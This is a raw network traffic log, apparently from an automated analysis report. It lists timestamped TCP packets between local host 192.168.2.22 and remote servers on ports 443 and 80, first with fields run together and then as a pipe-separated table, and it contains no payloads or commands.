                                                Sep 11, 2024 20:22:22.962405920 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.962701082 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.962754965 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.962770939 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.962826014 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.964477062 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.964545012 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.964596033 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.964615107 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.964649916 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.964710951 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.964895010 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.964962006 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.964968920 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.964987993 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.965017080 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.965147972 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.965583086 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.965651989 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.965681076 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.965692997 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.965709925 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.022635937 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.022715092 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.022758007 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.022797108 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.022814989 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.022838116 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.023049116 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.023108959 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.023118019 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.023144007 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.023173094 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.227977037 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.281810999 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.281846046 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.281862974 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.281886101 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.281919956 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.281936884 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.281955957 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.281971931 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.282001972 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.282001972 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.282018900 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.282526970 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.282547951 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.282578945 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.282594919 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.282610893 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.282630920 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.282656908 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.282666922 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.282747030 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.282766104 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.282800913 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.282830954 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.282879114 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.282897949 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.282917023 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.283653021 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.283703089 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.283719063 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.283751011 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.283802032 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.283811092 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.283940077 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.283993959 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.284006119 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.284039021 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.284061909 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.284204960 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.284257889 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.284269094 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.284332037 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.284387112 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.284395933 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.285099030 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.285154104 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.285164118 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.285191059 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.285219908 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.285305977 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.285353899 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.285365105 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.285389900 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.285434008 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.285443068 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.286051035 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.286103964 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.286117077 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.286139965 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.286171913 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.286943913 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.286998987 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.287018061 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.287043095 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.287072897 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.287154913 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.287198067 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.287209988 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.287229061 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.287272930 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.287281990 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.287808895 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.287859917 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.287878036 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.287902117 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.287929058 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.288057089 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.288105965 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.288119078 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.288136005 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.288180113 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.288192034 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.288990021 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.289043903 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.289060116 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.289083958 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.289110899 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.289201021 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.289251089 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.289263010 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.289287090 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.289338112 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.289347887 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.289747000 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.289813995 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.289824963 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.289966106 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.290014982 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.290025949 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.290127993 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.290178061 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.290188074 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.290205956 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.290254116 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.290261984 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.290766001 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.290817022 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.290833950 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.290859938 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.290885925 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.291071892 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.291122913 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.291134119 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.291150093 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.291192055 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.291201115 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.291521072 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.291573048 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.291583061 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.291605949 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.291657925 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.291667938 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.291721106 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.291770935 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.291781902 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.291800022 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.291843891 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.291852951 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.291873932 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.292562962 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.292613983 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.292634964 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.292660952 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.292689085 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.300210953 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.300240040 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.300261974 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.300287962 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.300339937 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.300688028 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.300720930 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.300743103 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.300755024 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.300769091 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.331562996 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.331629038 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.331655025 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.331691980 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.331708908 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.331718922 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.332462072 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.332515955 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.332534075 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.332560062 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.332592964 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.333118916 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.333179951 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.333182096 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.333209038 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.333236933 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.335083961 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.335141897 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.335161924 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.335212946 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.335261106 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.335270882 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.335649014 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.335715055 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.335717916 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.335743904 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.335771084 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.336059093 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.336112022 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.336131096 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.336153030 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.336180925 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.393058062 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.393147945 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.393145084 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.393182993 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.393210888 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.393352985 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.393486023 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.393496990 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.393522024 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.393553972 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.424228907 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.424297094 CEST44349162207.241.227.96192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 11, 2024 20:22:23.424360037 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.424401045 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.424420118 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.424428940 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.425072908 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.425136089 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.425169945 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.425194979 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.425229073 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.425810099 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.425873995 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.425890923 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.425908089 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.425930977 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.427618027 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.427690983 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.427694082 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.427722931 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.427747011 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.428328991 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.428381920 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.428392887 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.428419113 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.428446054 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.428647041 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.428808928 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.428874016 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.428878069 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.428906918 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.428936005 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.428977013 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.487098932 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.487170935 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.487335920 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.487335920 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.487335920 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.487396002 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.487586021 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.487646103 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.487656116 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.487682104 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.487716913 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.516791105 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.516858101 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.516920090 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.516937017 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.516978979 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.516978979 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.517688990 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.517752886 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.517760038 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.517790079 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.517822027 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.518497944 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.518557072 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.518563032 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.518594027 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.518625975 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.520302057 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.520368099 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.520378113 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.520402908 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.520441055 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.520772934 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.520833969 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.520838022 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.520864010 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.520895958 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.521193981 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.521270037 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.521280050 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.521305084 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.521337032 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.606240988 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.606388092 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.606410027 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.606432915 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.606482983 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.606491089 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.606591940 CEST | 443 | 49162 | 207.241.227.96 | 192.168.2.22
Sep 11, 2024 20:22:23.606637955 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.609018087 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.96
Sep 11, 2024 20:22:23.726671934 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:23.731753111 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:23.731827974 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:23.731884003 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:23.736692905 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.469748974 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.469768047 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.469779968 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.469784021 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.469845057 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.469857931 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.469868898 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.469875097 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.469912052 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.469912052 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.469950914 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.469964027 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.469988108 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
